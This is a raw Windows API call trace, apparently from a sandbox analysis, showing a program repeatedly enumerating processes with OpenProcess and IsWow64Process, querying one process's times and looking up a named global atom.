	[0124.021] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x69c
	[0124.021] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.021] CloseHandle (hObject=0x69c) returned 1
	[0124.021] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x69c
	[0124.021] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.021] CloseHandle (hObject=0x69c) returned 1
	[0124.022] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0124.022] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x69c
	[0124.022] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.022] CloseHandle (hObject=0x69c) returned 1
	[0124.022] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x69c
	[0124.022] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.022] CloseHandle (hObject=0x69c) returned 1
	[0124.022] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x69c
	[0124.022] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.022] CloseHandle (hObject=0x69c) returned 1
	[0124.023] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x69c
	[0124.023] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.023] CloseHandle (hObject=0x69c) returned 1
	[0124.023] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x69c
	[0124.023] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.023] CloseHandle (hObject=0x69c) returned 1
	[0124.023] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x69c
	[0124.023] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.023] CloseHandle (hObject=0x69c) returned 1
	[0124.023] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x69c
	[0124.023] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.024] CloseHandle (hObject=0x69c) returned 1
	[0124.024] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x69c
	[0124.024] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.024] CloseHandle (hObject=0x69c) returned 1
	[0124.024] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x69c
	[0124.024] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.024] CloseHandle (hObject=0x69c) returned 1
	[0124.024] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x69c
	[0124.024] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.024] CloseHandle (hObject=0x69c) returned 1
	[0124.024] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x69c
	[0124.024] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.024] CloseHandle (hObject=0x69c) returned 1
	[0124.025] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x69c
	[0124.025] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.025] CloseHandle (hObject=0x69c) returned 1
	[0124.025] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x69c
	[0124.025] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.025] CloseHandle (hObject=0x69c) returned 1
	[0124.026] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x69c
	[0124.026] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.026] CloseHandle (hObject=0x69c) returned 1
	[0124.026] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x69c
	[0124.026] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.026] CloseHandle (hObject=0x69c) returned 1
	[0124.026] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x69c
	[0124.026] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.026] CloseHandle (hObject=0x69c) returned 1
	[0124.026] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x69c
	[0124.027] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.027] CloseHandle (hObject=0x69c) returned 1
	[0124.027] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x69c
	[0124.027] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.027] CloseHandle (hObject=0x69c) returned 1
	[0124.027] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x69c
	[0124.027] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.027] CloseHandle (hObject=0x69c) returned 1
	[0124.027] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x69c
	[0124.027] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.027] CloseHandle (hObject=0x69c) returned 1
	[0124.027] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x69c
	[0124.028] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.028] CloseHandle (hObject=0x69c) returned 1
	[0124.028] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x69c
	[0124.028] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.028] CloseHandle (hObject=0x69c) returned 1
	[0124.028] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x69c
	[0124.028] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0124.028] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0124.028] GetProcessTimes (in: hProcess=0x69c, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0124.029] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0124.029] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0124.029] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0124.029] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0124.029] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0124.029] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0124.030] CloseHandle (hObject=0x69c) returned 1
	[0124.030] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0124.030] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x30c) returned 0x69c
	[0124.031] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.031] CloseHandle (hObject=0x69c) returned 1
	[0124.031] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdd4) returned 0x69c
	[0124.031] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.031] CloseHandle (hObject=0x69c) returned 1
	[0124.032] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd50) returned 0x69c
	[0124.032] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.032] CloseHandle (hObject=0x69c) returned 1
	[0124.032] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdb0) returned 0x69c
	[0124.032] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.032] CloseHandle (hObject=0x69c) returned 1
	[0124.032] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2e4) returned 0x69c
	[0124.032] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.032] CloseHandle (hObject=0x69c) returned 1
	[0124.072] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0124.072] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0124.072] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0124.073] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0124.073] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0124.073] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0124.073] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0124.073] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0124.074] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0124.074] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0124.074] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0124.074] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0124.074] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0124.074] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0124.075] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0124.075] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0124.075] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0124.075] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0124.076] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x69c
	[0124.076] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.076] CloseHandle (hObject=0x69c) returned 1
	[0124.076] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0124.076] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0124.076] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x69c
	[0124.076] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.076] CloseHandle (hObject=0x69c) returned 1
	[0124.076] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0124.077] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x69c
	[0124.077] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.077] CloseHandle (hObject=0x69c) returned 1
	[0124.077] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x69c
	[0124.077] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.077] CloseHandle (hObject=0x69c) returned 1
	[0124.077] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x69c
	[0124.077] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.077] CloseHandle (hObject=0x69c) returned 1
	[0124.077] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x69c
	[0124.078] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.078] CloseHandle (hObject=0x69c) returned 1
	[0124.078] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x69c
	[0124.080] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.080] CloseHandle (hObject=0x69c) returned 1
	[0124.080] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x69c
	[0124.080] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.080] CloseHandle (hObject=0x69c) returned 1
	[0124.080] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0124.080] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x69c
	[0124.080] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.080] CloseHandle (hObject=0x69c) returned 1
	[0124.081] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x69c
	[0124.081] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.081] CloseHandle (hObject=0x69c) returned 1
	[0124.081] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x69c
	[0124.081] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.081] CloseHandle (hObject=0x69c) returned 1
	[0124.081] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x69c
	[0124.081] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.081] CloseHandle (hObject=0x69c) returned 1
	[0124.081] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x69c
	[0124.081] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.082] CloseHandle (hObject=0x69c) returned 1
	[0124.082] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x69c
	[0124.082] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.082] CloseHandle (hObject=0x69c) returned 1
	[0124.082] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x69c
	[0124.082] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.082] CloseHandle (hObject=0x69c) returned 1
	[0124.082] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x69c
	[0124.082] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.082] CloseHandle (hObject=0x69c) returned 1
	[0124.083] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x69c
	[0124.083] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.083] CloseHandle (hObject=0x69c) returned 1
	[0124.083] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x69c
	[0124.083] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.083] CloseHandle (hObject=0x69c) returned 1
	[0124.083] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x69c
	[0124.083] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.083] CloseHandle (hObject=0x69c) returned 1
	[0124.083] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x69c
	[0124.083] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.086] CloseHandle (hObject=0x69c) returned 1
	[0124.086] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x69c
	[0124.086] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.086] CloseHandle (hObject=0x69c) returned 1
	[0124.087] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x69c
	[0124.087] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.087] CloseHandle (hObject=0x69c) returned 1
	[0124.087] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x69c
	[0124.087] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.087] CloseHandle (hObject=0x69c) returned 1
	[0124.087] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x69c
	[0124.087] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.087] CloseHandle (hObject=0x69c) returned 1
	[0124.087] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x69c
	[0124.087] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.087] CloseHandle (hObject=0x69c) returned 1
	[0124.088] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x69c
	[0124.088] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.088] CloseHandle (hObject=0x69c) returned 1
	[0124.088] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x69c
	[0124.088] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.088] CloseHandle (hObject=0x69c) returned 1
	[0124.088] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x69c
	[0124.088] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.088] CloseHandle (hObject=0x69c) returned 1
	[0124.088] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x69c
	[0124.088] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.088] CloseHandle (hObject=0x69c) returned 1
	[0124.089] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x69c
	[0124.089] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.089] CloseHandle (hObject=0x69c) returned 1
	[0124.089] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x69c
	[0124.089] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0124.089] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0124.090] GetProcessTimes (in: hProcess=0x69c, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0124.090] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0124.090] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0124.090] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0124.091] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0124.091] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0124.091] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0124.091] CloseHandle (hObject=0x69c) returned 1
	[0124.091] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0124.091] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x30c) returned 0x69c
	[0124.091] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.091] CloseHandle (hObject=0x69c) returned 1
	[0124.091] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdd4) returned 0x69c
	[0124.091] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.091] CloseHandle (hObject=0x69c) returned 1
	[0124.091] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd50) returned 0x69c
	[0124.091] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.092] CloseHandle (hObject=0x69c) returned 1
	[0124.092] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdb0) returned 0x69c
	[0124.092] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.092] CloseHandle (hObject=0x69c) returned 1
	[0124.092] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2e4) returned 0x69c
	[0124.092] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.092] CloseHandle (hObject=0x69c) returned 1
	[0124.125] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0124.125] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0124.126] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0124.126] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0124.126] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0124.126] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0124.126] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0124.126] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0124.127] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0124.127] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0124.127] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0124.127] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0124.127] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0124.127] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0124.128] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0124.128] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0124.128] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0124.128] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0124.128] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x69c
	[0124.128] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.128] CloseHandle (hObject=0x69c) returned 1
	[0124.129] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0124.129] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0124.129] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x69c
	[0124.129] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.129] CloseHandle (hObject=0x69c) returned 1
	[0124.129] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0124.129] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x69c
	[0124.129] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.129] CloseHandle (hObject=0x69c) returned 1
	[0124.129] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x69c
	[0124.130] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.130] CloseHandle (hObject=0x69c) returned 1
	[0124.130] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x69c
	[0124.130] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.130] CloseHandle (hObject=0x69c) returned 1
	[0124.130] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x69c
	[0124.130] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.130] CloseHandle (hObject=0x69c) returned 1
	[0124.130] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x69c
	[0124.130] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.130] CloseHandle (hObject=0x69c) returned 1
	[0124.130] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x69c
	[0124.131] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.131] CloseHandle (hObject=0x69c) returned 1
	[0124.131] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0124.131] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x69c
	[0124.131] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.131] CloseHandle (hObject=0x69c) returned 1
	[0124.131] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x69c
	[0124.131] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.131] CloseHandle (hObject=0x69c) returned 1
	[0124.132] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x69c
